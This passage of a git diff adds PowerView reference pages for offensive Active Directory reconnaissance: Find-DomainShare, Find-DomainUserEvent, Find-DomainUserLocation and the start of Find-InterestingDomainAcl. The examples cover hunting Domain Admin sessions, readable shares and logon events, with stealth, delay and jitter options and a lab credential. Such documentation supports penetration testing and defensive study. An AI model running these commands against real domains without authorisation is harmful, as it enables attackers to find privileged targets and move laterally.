False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StopOnSuccess +Switch. +Stop hunting after finding after finding a target user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.UserProcess + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainShare.md b/docs/Recon/Find-DomainShare.md new file mode 100755 index 0000000..71274b7 --- /dev/null +++ b/docs/Recon/Find-DomainShare.md @@ -0,0 +1,335 @@ +# Find-DomainShare + +## SYNOPSIS +Searches for computer shares on the domain. +If -CheckShareAccess is passed, +then only shares the current user has read access to are returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction + +## SYNTAX + +``` +Find-DomainShare [[-ComputerName] ] [-ComputerDomain ] [-ComputerLDAPFilter ] + [-ComputerSearchBase ] [-ComputerOperatingSystem ] [-ComputerServicePack ] + [-ComputerSiteName ] [-CheckShareAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. +If -CheckShareAccess is passed, then +\[IO.Directory\]::GetFiles() is used to check if the current user has read +access to the given share. +If -Credential is passed, then +Invoke-UserImpersonation is used to impersonate the specified user before +enumeration, reverting after with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainShare +``` + +Find all domain shares in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainShare -CheckShareAccess +``` + +Find all domain shares in the current domain that the current user has +read access to. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches for domain shares in the testlab.local domain using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Domain + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckShareAccess +Switch. +Only display found shares that the local user has access to. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: CheckAccess + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ShareInfo + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainUserEvent.md b/docs/Recon/Find-DomainUserEvent.md new file mode 100755 index 0000000..12e64a9 --- /dev/null +++ b/docs/Recon/Find-DomainUserEvent.md @@ -0,0 +1,451 @@ +# Find-DomainUserEvent + +## SYNOPSIS +Finds logon events on the current (or remote domain) for the specified users. + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction + +## SYNTAX + +### Domain (Default) +``` +Find-DomainUserEvent [-Domain ] [-Filter ] [-StartTime ] [-EndTime ] + [-MaxEvents ] [-UserIdentity ] [-UserDomain ] [-UserLDAPFilter ] + [-UserSearchBase ] [-UserGroupIdentity ] [-UserAdminCount] [-CheckAccess] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +### ComputerName +``` +Find-DomainUserEvent [[-ComputerName] ] [-Filter ] [-StartTime ] + [-EndTime ] [-MaxEvents ] [-UserIdentity ] [-UserDomain ] + [-UserLDAPFilter ] [-UserSearchBase ] [-UserGroupIdentity ] [-UserAdminCount] + [-CheckAccess] [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] + [-Tombstone] [-Credential ] [-StopOnSuccess] [-Delay ] [-Jitter ] + [-Threads ] +``` + +## DESCRIPTION +Enumerates all domain controllers from the specified -Domain +(default of the local domain) using Get-DomainController, enumerates +the logon events for each using Get-DomainUserEvent, and filters +the results based on the targeting criteria. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainUserEvent +``` + +Search for any user events matching domain admins on every DC in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$cred = Get-Credential dev\administrator +``` + +Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john' + +Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local' +domain controller using the alternate credential + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'} +``` + +Find user events on the primary.testlab.local system where the event matches +the IPAddress '192.168.52.200' or '192.168.52.201'. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$cred = Get-Credential testlab\administrator +``` + +Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'} + +Find user events mathing the specified GUID AND the specified TargetLogonId, searching +through every domain controller in the current domain, enumerating each DC in serial +instead of in a threaded manner, using the alternate credential. + +## PARAMETERS + +### -ComputerName +Specifies an explicit computer name to retrieve events from. + +```yaml +Type: String[] +Parameter Sets: ComputerName +Aliases: dnshostname, HostName, name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies a domain to query for domain controllers to enumerate. +Defaults to the current domain. + +```yaml +Type: String +Parameter Sets: Domain +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Filter +A hashtable of PowerView.LogonEvent properties to filter for. +The 'op|operator|operation' clause can have '&', '|', 'and', or 'or', +and is 'or' by default, meaning at least one clause matches instead of all. +See the exaples for usage. + +```yaml +Type: Hashtable +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StartTime +The \[DateTime\] object representing the start of when to collect events. +Default of \[DateTime\]::Now.AddDays(-1). + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now.AddDays(-1) +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -EndTime +The \[DateTime\] object representing the end of when to collect events. +Default of \[DateTime\]::Now. + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -MaxEvents +The maximum number of events (per host) to retrieve. +Default of 5000. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 5000 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Specifies one or more user identities to search for. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserDomain +Specifies the domain to query for users to search for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserLDAPFilter +Specifies an LDAP query string that is used to search for target users. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserSearchBase +Specifies the LDAP source to search through for target users. +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserGroupIdentity +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: GroupName, Group + +Required: False +Position: Named +Default value: Domain Admins +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAdminCount +Switch. +Search for users users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: AdminCount + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckAccess +{{Fill CheckAccess Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target computer(s). + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StopOnSuccess +Switch. +Stop hunting after finding after finding a target user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LogonEvent + +PowerView.ExplicitCredentialLogon + +## NOTES + +## RELATED LINKS + +[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/) + diff --git a/docs/Recon/Find-DomainUserLocation.md b/docs/Recon/Find-DomainUserLocation.md new file mode 100755 index 0000000..0d200aa --- /dev/null +++ b/docs/Recon/Find-DomainUserLocation.md @@ -0,0 +1,579 @@ +# Find-DomainUserLocation + +## SYNOPSIS +Finds domain machines where specific users are logged into. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction + +## SYNTAX + +### UserGroupIdentity (Default) +``` +Find-DomainUserLocation [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] [-UserGroupIdentity ] + [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Stealth] [-StealthSource ] [-Threads ] +``` + +### UserIdentity +``` +Find-DomainUserLocation [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserIdentity ] [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] + [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Stealth] [-StealthSource ] [-Threads ] +``` + +### ShowAll +``` +Find-DomainUserLocation [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] [-UserAdminCount] + [-UserAllowDelegation] [-CheckAccess] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-StopOnSuccess] [-Delay ] + [-Jitter ] [-ShowAll] [-Stealth] [-StealthSource ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. +Then for each server the +function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon +The found user list is compared against the target list, and any matches are +displayed. +If -ShowAll is specified, all results are displayed instead of +the filtered set. +If -Stealth is specified, then likely highly-trafficed servers +are enumerated with Get-DomainFileServer/Get-DomainController, and session +enumeration is executed only against those servers. +If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainUserLocation +``` + +Searches for 'Domain Admins' by enumerating every computer in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainUserLocation -Stealth -ShowAll +``` + +Enumerates likely highly-trafficked servers, performs just session enumeration +against each, and outputs all results. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local +``` + +Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged +users in dev.testlab.local. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainUserLocation -Domain testlab.local -Credential $Cred + +Searches for domain admin locations in the testlab.local using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to query for computers AND users, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerUnconstrained +Switch. +Search computer objects that have unconstrained delegation. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Unconstrained + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Specifies one or more user identities to search for. + +```yaml +Type: String[] +Parameter Sets: UserIdentity +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserDomain +Specifies the domain to query for users to search for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserLDAPFilter +Specifies an LDAP query string that is used to search for target users. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserSearchBase +Specifies the LDAP source to search through for target users. +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserGroupIdentity +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +```yaml +Type: String[] +Parameter Sets: UserGroupIdentity +Aliases: GroupName, Group + +Required: False +Position: Named +Default value: Domain Admins +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAdminCount +Switch. +Search for users users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: AdminCount + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAllowDelegation +Switch. +Search for user accounts that are not marked as 'sensitive and not allowed for delegation'. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: AllowDelegation + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckAccess +Switch. +Check if the current user has local admin access to computers where target users are found. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StopOnSuccess +Switch. +Stop hunting after finding after finding a target user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ShowAll +Switch. +Return all user location results instead of filtering based on target +specifications. + +```yaml +Type: SwitchParameter +Parameter Sets: ShowAll +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Stealth +Switch. +Only enumerate sessions from connonly used target servers. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StealthSource +The source of target servers to use, 'DFS' (distributed file servers), +'DC' (domain controllers), 'File' (file servers), or 'All' (the default). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: All +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.UserLocation + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-InterestingDomainAcl.md b/docs/Recon/Find-InterestingDomainAcl.md new file mode 100755 index 0000000..eeda73a --- /dev/null +++ b/docs/Recon/Find-InterestingDomainAcl.md @@ -0,0 +1,239 @@ +# Find-InterestingDomainAcl + +## SYNOPSIS +Finds object ACLs in the current (or specified) domain with modification +rights set to non-built in objects. + +Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName + +## SYNTAX + +``` +Find-InterestingDomainAcl [[-Domain] ] [-ResolveGUIDs] [-RightsFilter ] [-LDAPFilter ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +This function enumerates the 